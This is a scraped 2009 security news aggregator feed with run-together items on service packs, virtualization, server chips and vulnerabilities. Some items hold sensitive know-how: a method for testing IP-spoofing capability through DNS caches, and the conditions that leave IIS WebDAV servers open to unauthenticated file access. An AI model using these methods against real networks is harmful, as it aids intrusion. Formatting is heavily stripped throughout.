http://www.secuobs.com/revue/news/102675.shtmlhttp://www.secuobs.com/revue/news/102675.shtml 2009-05-28 13:34:32 - Network World on Security : Some organizations, including Stanford Hospital and Clinics, haveprescribed a cautious approach to virtualization, mindful that"there's uncertainty" about what’s still seen as a new technologyhttp://www.secuobs.com/revue/news/102665.shtmlhttp://www.secuobs.com/revue/news/102665.shtml 2009-05-28 13:25:24 - Alerte : Après une longue phase de pré-version, le Service Pack 2 du noyauVista/Windows Server 2008 est disponible en téléchargement, en version32 et 64 bits Comme à l’accoutumé, la prudence impose de ne validerson déploiement qu’après une période de tests de régression Fortheureusement, une partie de ces tests peuvent être effectués dans lecadre sécurisé d’une VM… problèmes d’incompatibilité avec les «couches basses » et drivers non comprishttp://www.secuobs.com/revue/news/102625.shtmlhttp://www.secuobs.com/revue/news/102625.shtml 2009-05-28 00:06:13 - Tricks of the Trade : Killing time in the metro by listening to podcasts of past securityconferences, I got the idea of using DNS caches to check IP-spoofingcapabilityNow, the easiest way to check if you can send packets to the Internetwith a fake source IP address would be with two computers indifferent ASs, but that's no fun, is it :Basically, the idea is you can know from a DNS caching server if youare the first client getting the reply to some query by either* asking it about a domain for which it would have to recurse, whileforbidding recursion: if you get a positive reply this meanssomebody else asked the same question before you* comparing maximum Time-To-Live value for the test domain with theTTL value you received in the reply: if different, this too meanssomebody else asked the same question before youSo, if you issue an improbable query for example0577493021235325521009964ws which will resolve correctly becausews uses wildcard records to a DNS caching server while faking thesource IP address, and then issue the very same query from your realIP address a couple of seconds after, the reply to the latter willtell if the DNS server received the formerThe only problem is making sure no network equipment enforced a realsource IP address on the packets Some ISPs might simply rewrite thesource IP address instead of just dropping the packet, which most ofthem do : this is easy to detect because you would get replies toboth the "fake" and real queries NAT routers are more annoying: mineaccepts the fake public IP address as source to the packets, stores itin its table, forwards the packets with its real IP address, and whenthe replies arrive doesn't know whom to send the packets to, otherthan to the DMZ which is noticeable because it starts sending ARPrequests for it Stupid, stupid NAT routerAnyway, here's the codeIMAGEhttp://www.secuobs.com/revue/news/102303.shtmlhttp://www.secuobs.com/revue/news/102303.shtml 2009-05-27 07:09:26 - National Vulnerability Database : Cross-site scripting XSS vulnerability in Sun Java System Portal Server631, 71, and 72 allows remote attackers to inject arbitrary webscript or HTML via vectors related to an error pagehttp://www.secuobs.com/revue/news/102066.shtmlhttp://www.secuobs.com/revue/news/102066.shtml 2009-05-27 07:01:10 - extraexploit : http://www.secuobs.com/revue/news/102056.shtmlhttp://www.secuobs.com/revue/news/102056.shtml 2009-05-27 01:53:01 - Hack In The Box : Intel on Tuesday said it will ship a server chip that contains up toeight processing cores later this year, while IBM showed off ahigh-end server in the works that uses eight such chips, yielding 64cores Intel's Nehalem-EX processor, in production later this year andexpected to be shipping in high-end server systems by early 2010, willfeature up to eight cores inside a single chip that supports 16threads, according to Boyd Davis, Intel's general manager of theServer Platforms Marketing Group, speaking at a teleconference onTuesday Using threads, Intel essentially doubles the amount of workthat can be done on each processing core IBM, which participated inthe conference, discussed a server currently under development thatuses 64 Nehalem-EX cores eight processors and can handle 128threads, according to Alex Yost, vice president IBM BladeCenter"We're very excited today to be the first to demonstrate Nehalem-EX,"Yost saidhttp://www.secuobs.com/revue/news/102013.shtmlhttp://www.secuobs.com/revue/news/102013.shtml 2009-05-27 01:52:27 - DARK KNIGHT : Cela fait 3 jours qu’un nouveau server P2P diffuse les fichiers Un grandmerci à Altano Staff Hackever pour ca sympathie et ca motivationCette action permettra à plus de personnes de pouvoir télécharger lesfichiers plus rapidement Encore un grand merci l’Ami http://www.secuobs.com/revue/news/102003.shtmlhttp://www.secuobs.com/revue/news/102003.shtml 2009-05-27 01:39:14 - 4sysops : Windows Vista SP2 and Server 2008 SP2 available for public download:x86: x64: ISO: System Update Readiness Tool for Windows 7 ReleaseCandidate System Update Readiness Tool for Windows Server 2008 R2Release Candidate for x64 Edition Windows Server 2008 R2 VDIstep-by-step guides Copyright © 2006-2009, 4sysops, Digitalfingerprint: 3db371642e7c3f4fe3ee9d5cf7666eb0http://www.secuobs.com/revue/news/101924.shtmlhttp://www.secuobs.com/revue/news/101924.shtml 2009-05-26 16:35:23 - Governmentsecurity.org : Certain packets can cause a crash An update and patches solve theproblemIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/101732.shtmlhttp://www.secuobs.com/revue/news/101732.shtml 2009-05-26 15:34:58 - Security Bloggers Network : You are not at risk if : Source : Microsoft SRD Team* "An IIS server not running WebDAV is safeThe Windows Server 2003 IIS version 6 shipped with WebDAVdisabled by default* An IIS server not using IIS permissions to restrict content toauthenticated users is safe* An IIS server that does not grant filesystem access to theIUSR_MachineName account is safe* An IIS server that hosts web applications using only forms-basedauthentication is probably safeYou are at risk : Source Microsoft SRD Team, except italics bymyself* IF an IIS 5, 51, or 60 webserver is running with WebDAV enableddefault for IIS5;* AND the IIS server is using IIS permissions to restrict asubfolder of content to authenticated users;* AND file system access is granted for the restricted content tothe IUSR_MachineName account;* AND a parent folder of the private subfolder allows anonymousaccess;THEN an anonymous remote user may be able to leverage thisvulnerability to access files that normally would only be servedto authenticated webserver users"These attacks are continuing on an intensive scale it is only amatter of time before they arrive at your site if you didn't fix itGo to IIS 7 and leave the things off that are disabled if you don'thave learned in every detail what you should and shouldn't doIMAGE IMAGE IMAGE IMAGE IMAGE IMAGEhttp://www.secuobs.com/revue/news/101658.shtmlhttp://www.secuobs.com/revue/news/101658.shtml 2009-05-26 06:48:53 - ReverseConnection : NetDecision TFTP Server Directory Traversal Vulnerability Source: clickherehttp://www.secuobs.com/revue/news/101608.shtmlhttp://www.secuobs.com/revue/news/101608.shtml 2009-05-26 03:14:09 - Security Bloggers Network : for more detailed information you have to go tohttp://insecureskynetblogsbe but as officials are following thisblog we publish the Belgian info hereThe beladennet network of malware sites is one of the best and mostdns genius constructions of malware delivery and insertion seenaround It has been going on since november 2008 and is still in fullforce It is hard to find usable information but we will publish whatwe have found on insecure There is already a practical guide how tofind the infection apache on linux but we still have to find otherguides because it also attacks joomla sites to name but oneWe will publish exclusively a list of some tens of sites that we havefound that seem to be hosting or redirecting to these infecting sitesOne of them is a Belgian be site and according to robtexcom it is afully redirecting site to the other sites that will serve up to 190different forms of spyware and malware you can throw away your pcafter thatbo20getting it down IMAGE IMAGE IMAGE IMAGE IMAGE IMAGEhttp://www.secuobs.com/revue/news/101469.shtmlhttp://www.secuobs.com/revue/news/101469.shtml 2009-05-23 21:48:51 - Channel 9 : IMAGEIn this episode Donovan sits down with the Intand President, BryanOtis, and CIO, Scott Otis, along with Vijay Rajagopalan, PrincipalArchitect, Microsoft Interoperability Strategy, to drill into howIntand enabled their PHP application to support information cardsThis prototype project, for the Lake Washington School District, wasbased upon the use of Microsoft code name Geneva Server, WindowsCardSpace Geneva and Intand’s PHP application using the ZendFramework’s information card support for interoperability Thisproject was also featured in a keynote address at the April, 2009 RSAConferenceURL references:“Geneva” Forum on MSDN"Geneva" Team BlogMicrosoft code name "Geneva"The Identity key topic on Channel 9Zend Download for Information Card Supporthttp://www.secuobs.com/revue/news/101037.shtmlhttp://www.secuobs.com/revue/news/101037.shtml 2009-05-23 12:26:55 - Rootsecure.net : H Security: Cisco TFTP Server allows unauthenticated system accesshttp://www.secuobs.com/revue/news/100965.shtmlhttp://www.secuobs.com/revue/news/100965.shtml 2009-05-22 19:24:41 - Security Bloggers Network : Here is an experiment for you to try Go to googlecom and type in theterm “server virtualization” but don’t press ENTER If “GoogleSuggestions” is working you should see a ranked list of about tensuggested searches that Google Suggestions creates from the “…relative popularity of common searches…” When I did this test http://www.secuobs.com/revue/news/100639.shtmlhttp://www.secuobs.com/revue/news/100639.shtml 2009-05-22 19:24:41 - Security Bloggers Network : digg_url ="http://blogsmsdncom/vbertocci/archive/2009/05/21/the-id-element-weekly-geneva-server-windows-cardspace-geneva-information-cards-and-php-interoperabilityaspx";digg_title= "The Id Element weekly: Geneva Server, Windows CardSpace Geneva,Information Cards and PHP Interoperability";digg_bgcolor ="#FFFFFF";digg_skin = "normal";digg_url = undefined;digg_title =undefined;digg_bgcolor = undefined;digg_skin = undefined;IMAGEimageWhile I was circling SFO searching for the Avis rentals return park,yesterday Donovan was publishing a new episode of the Id Element: thistime you get to see the man, as opposed of the usual disembodiedvoice, as he interviews the Otis and Vijay about the Lake WashingtonSchool District project or RSA’s keynote fameI am downloading the video on my little Zune for viewing it betweenone hike and the other for Memorial weekend; not sure if my wife willapprove, but I’ll give it a try ;-Enjoy the showIMAGEhttp://www.secuobs.com/revue/news/100635.shtmlhttp://www.secuobs.com/revue/news/100635.shtml 2009-05-22 18:35:48 - extraexploit : http://www.secuobs.com/revue/news/100516.shtmlhttp://www.secuobs.com/revue/news/100516.shtml